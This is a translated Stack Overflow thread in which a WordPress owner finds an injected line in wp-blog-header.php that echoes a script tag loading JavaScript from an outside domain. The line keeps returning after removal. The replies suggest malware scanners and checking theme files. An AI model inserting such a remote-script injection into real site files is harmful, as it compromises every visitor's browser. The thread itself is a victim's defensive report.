首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >我的wordpress网站被黑了

我的wordpress网站被黑了
EN

Stack Overflow用户
提问于 2015-09-25 23:07:24
回答 3查看 4.6K关注 0票数 0

因为某些原因,我的网站被黑了。

我检查了我的FTP文件,我注意到wp-blog-header.php最近被修改了。

这是我被黑之前的wp-blog-header.php

代码语言:javascript
复制
<?php  
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( !isset($wp_did_header) ) {

    $wp_did_header = true;

    require_once( dirname(__FILE__) . '/wp-load.php' );

    wp();

    require_once( ABSPATH . WPINC . '/template-loader.php' );

}

这是我被黑客入侵后的文件:

代码语言:javascript
复制
<?php echo "<script type='text/javascript' src='http://www.oxxtm.com/images/wp-logo.js'></script>"; 
/**
 * Loads the WordPress environment and template.
...

因此,他们在我的文件中添加了这一行:

代码语言:javascript
复制
echo "<script type='text/javascript' src='http://www.oxxtm.com/images/wp-logo.js'></script>"; 

当我删除这一行时,我的网站运行良好,但几个小时后,他们又添加了这一行。我检查了我的数据库行,但我没有发现任何错误。在我看来,这是一个新的失败。我昨天用谷歌搜索了一下,我找不到太多,只有一些法国网站说他们对这个问题没有任何明确的解决方案。那么,以前有没有人经历过呢?

这些是我在这个站点中使用的插件和它们各自的版本:

代码语言:javascript
复制
WordPress v4.1.8
Advanced Custom Fields v4.0.0
EN

回答 3

Stack Overflow用户

发布于 2015-09-27 17:24:11

使用插件反恶意软件GOTMLS.NET https://wordpress.org/plugins/gotmls/它已经为我们解决了完全相同的问题,到目前为止还不错,几乎24小时都没有看到脚本。

票数 0
EN

Stack Overflow用户

发布于 2015-09-30 06:03:20

wp-blog-header.php不是唯一受此恶意软件影响的文件。检查你的footer.php (你的主题文件)。

我还没有弄清楚它是如何感染wp安装的。不过,我还在努力。

票数 0
EN

Stack Overflow用户

发布于 2015-10-01 22:44:52

也发生在我身上。幸运的是,我刚刚安装了一个安全插件,它提醒我一个我知道的未经授权的登录,我现在正在调查,并将在这里再次更新。

票数 0
EN
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://stackoverflow.com/questions/32785243

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档